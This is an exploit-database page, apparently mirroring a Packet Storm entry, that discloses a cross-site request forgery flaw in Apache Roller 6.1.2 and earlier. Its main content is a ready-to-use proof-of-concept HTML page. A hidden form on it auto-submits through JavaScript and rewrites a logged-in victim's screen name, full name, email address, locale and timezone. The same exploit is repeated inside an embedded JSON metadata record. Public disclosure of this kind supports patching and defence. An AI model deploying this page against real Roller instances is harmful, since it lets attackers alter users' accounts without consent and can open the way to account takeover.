📄 Apache Roller 6.1.2 Cross Site Request Forgery_PACKETSTORM:214706

Description

Apache Roller versions 6.1.2 and below contain a cross site request forgery vulnerability in endpoint /roller/roller-ui/profile!save.rol. This vulnerability allows attackers to arbitrarily update the victim user's profile information e.g., email, full...

Visit Original Source

Basic Information

ID PACKETSTORM:214706

Published Feb 2, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: Apache Roller v6.1.2 - Cross-Site Request Forgery (CSRF) in Profile Update
# Version: v6.1.2
# Date: 2025-11-09
# Exploit Author: Van Lam Nguyen
# Facebook: https://www.facebook.com/vanlam1412
# Vendor Homepage: https://roller.apache.org
# Software Link: https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip
# Tested on: Windows
# CVE: N/A
# POC: https://github.com/vanlam2001/roller-csrf

Overview
==================================================
Roller v6.1.2 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /roller/roller-ui/profile!save.rol.
This vulnerability allows attackers to arbitrarily update the victim user's profile information (e.g., email, full name, locale, timezone) via a crafted HTML page

Proof of Concept
==================================================
Made an unauthorized request to /roller/roller-ui/profile!save.rol that updates the user's profile without CSRF protection
<html>
</head>
<form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
<input name="bean.userName" value="vanlam" type="hidden">
<input name="bean.screenName" value="hacked" type="hidden">
<input name="bean.fullName" value="hacked" type="hidden">
<input name="bean.emailAddress" value="[email protected]" type="hidden">
<input name="bean.passwordText" value="" type="hidden">
<input name="bean.passwordConfirm" value="" type="hidden">
<input name="bean.locale" value="vi_VN" type="hidden">
<input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
</form>

<script>
document.getElementById('exploitForm').submit();
</script>
</body>
</html>

bean.userName: vanlam
bean.screenName: hacked
bean.fullName: hacked
bean.emailAddress: [email protected]
bean.passwordText:
bean.passwordConfirm:
bean.locale: vi_VN
bean.timeZone: Asia/Bangkok

{
    "lastseen": "2026-02-02T17:40:02",
    "description": "Apache Roller versions 6.1.2 and below contain a cross site request forgery vulnerability in endpoint /roller/roller-ui/profile!save.rol. This vulnerability allows attackers to arbitrarily update the victim user's profile information e.g., email, full...",
    "published": "2026-02-02T00:00:00",
    "modified": "2026-02-02T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Apache Roller 6.1.2 Cross Site Request Forgery",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214706",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# Exploit Title: Apache Roller v6.1.2 - Cross-Site Request Forgery (CSRF) in Profile Update\n    # Version: v6.1.2\n    # Date: 2025-11-09\n    # Exploit Author: Van Lam Nguyen\n    # Facebook: https://www.facebook.com/vanlam1412\n    # Vendor Homepage: https://roller.apache.org\n    # Software Link: https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip\n    # Tested on: Windows\n    # CVE: N/A\n    # POC: https://github.com/vanlam2001/roller-csrf\n    \n    Overview\n    ==================================================\n    Roller v6.1.2 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /roller/roller-ui/profile!save.rol. \n    This vulnerability allows attackers to arbitrarily update the victim user's profile information (e.g., email, full name, locale, timezone) via a crafted HTML page\n    \n    Proof of Concept\n    ==================================================\n    Made an unauthorized request to /roller/roller-ui/profile!save.rol that updates the user's profile without CSRF protection\n    <html>\n    </head>\n        <form id=\"exploitForm\" action=\"http://localhost:8080/roller/roller-ui/profile!save.rol\" method=\"POST\">\n            <input name=\"bean.userName\" value=\"vanlam\" type=\"hidden\">\n            <input name=\"bean.screenName\" value=\"hacked\" type=\"hidden\">\n            <input name=\"bean.fullName\" value=\"hacked\" type=\"hidden\">\n            <input name=\"bean.emailAddress\" value=\"[email protected]\" type=\"hidden\">\n            <input name=\"bean.passwordText\" value=\"\" type=\"hidden\">\n            <input name=\"bean.passwordConfirm\" value=\"\" type=\"hidden\">\n            <input name=\"bean.locale\" value=\"vi_VN\" type=\"hidden\">\n            <input name=\"bean.timeZone\" value=\"Asia/Bangkok\" type=\"hidden\">\n        </form>\n    \n        <script>\n            document.getElementById('exploitForm').submit();\n        </script>\n    </body>\n    </html>\n    \n    bean.userName: vanlam\n    bean.screenName: hacked\n    bean.fullName: hacked\n    bean.emailAddress: [email protected]\n    bean.passwordText: \n    bean.passwordConfirm: \n    bean.locale: vi_VN\n    bean.timeZone: Asia/Bangkok",
    "sourceHref": "https://packetstorm.news/download/214706",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214706/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply